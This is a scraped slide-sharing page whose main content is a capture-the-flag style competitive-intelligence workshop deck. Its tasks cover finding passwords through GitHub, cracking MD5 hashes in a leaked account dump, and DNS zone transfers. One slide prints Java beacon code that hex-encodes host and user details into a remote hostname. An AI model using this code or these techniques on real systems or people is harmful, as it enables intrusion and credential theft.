Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
 
Zeshan Sattar- Assessing the skill requirements and industry expectations for...
Zeshan Sattar- Assessing the skill requirements and industry expectations for...Zeshan Sattar- Assessing the skill requirements and industry expectations for...
Zeshan Sattar- Assessing the skill requirements and industry expectations for...
 
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
Potential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and InsightsPotential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and Insights
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptx
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
 
Top 10 Hubspot Development Companies in 2024
Top 10 Hubspot Development Companies in 2024Top 10 Hubspot Development Companies in 2024
Top 10 Hubspot Development Companies in 2024
 
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
 

Security Hole #11 - Competitive intelligence - Beliaiev

  • 1.
  • 3. What is Competitive Intelligence(CI)?
  • 4.
  • 6.
  • 7.
  • 8.
  • 9.
  • 10.
  • 11. Start is here: goo.gl/ygm51k Інфо ебаут хак The Workshop
  • 12. Task #1. Intro We know that Mikko Kuttonen is using github. His github for working staff is mikkoKut1 You have to find his password for the home media server(107.170.*.*).
  • 13. Task #2. Pakistani There is a hacker from Pakistan. He is paid for hunting for a different journalists, that show how things in Ukraine are going on during the revolution. We have some information about his last attacks, so we have to find out what he has done with his victims.
  • 14. We have some dump with journalist's accounts on times.com. (times.zip) Let's find any password, that he could hack. We know that only one of those accounts got hacked, so we have to find the easiest password. Task #2. Pakistani Hint! Journalist’s passwords are encrypted with MD5 algorithm Hint! You can use MD5 online decoders
  • 15. Task #3. Archive As you can see, we also have another archive with file zik.doc, which we need, but it's encrypted. We need to read the data from zikua.doc Hint! Look carefully for the files in archives. Are there any common things? Hint! You might also use some tools, which you have got with the tasks. But remember, you don’t have much time.
  • 16. Task #4. Zik.ua From the previous task we have got information, that there are some important files on torrent server on a*****.zik.ua We need to find the subdomain and torrent server. Hint! DNS-requests might help you Hint! You can try to use AXFR-requests
  • 18.
  • 19.
  • 20. Task #5. Find the hacker Finally we managed to find the real IP address of Pakistani hacker, and even bruteforce his RDP password. We started to download his private files, but suddenly connection was lost...forever. We managed to download only one file. Using this file, find the name of the hacker!
  • 21. Task #5. Find the hacker
  • 22. • Nickname: johnsmith@athc.biz • Find his place and date of birth Tasks from PHDays
  • 26. Tasks from PHDays String str1 = System.getProperty("os.name"); String str2 = System.getProperty("user.name"); InetAddress localInetAddress2 = InetAddress.getLocalHost(); InetAddress[] arrayOfInetAddress = InetAddress.getAllByName(localInetAddress2.getCanonicalHostName()); String str3 = arrayOfInetAddress[0].toString(); InetAddress localInetAddress1 = InetAddress.getLocalHost(); String str4 = localInetAddress1.getHostName(); String str5 = toHexString(str4.getBytes()) + toHexString("|".getBytes()) + toHexString(str2.getBytes()) + toHexString("|".getBytes()) + toHexString(str1.getBytes()); if (str5.length() > 63) { str5 = str5.substring(0, 63); } Socket localSocket = new Socket(str5 + paramString2, 80); String str6 = readAll(localSocket); String str7 = "access=true"; if (str6.contains(str7)) { localSocket = new Socket(paramString1 + "/loadsmb.cgi?host=" + str3 + "&file=/", 80);
  • 27. Tasks from PHDays + WebRTC (net.ipcalf.com)
  • 29. ? ?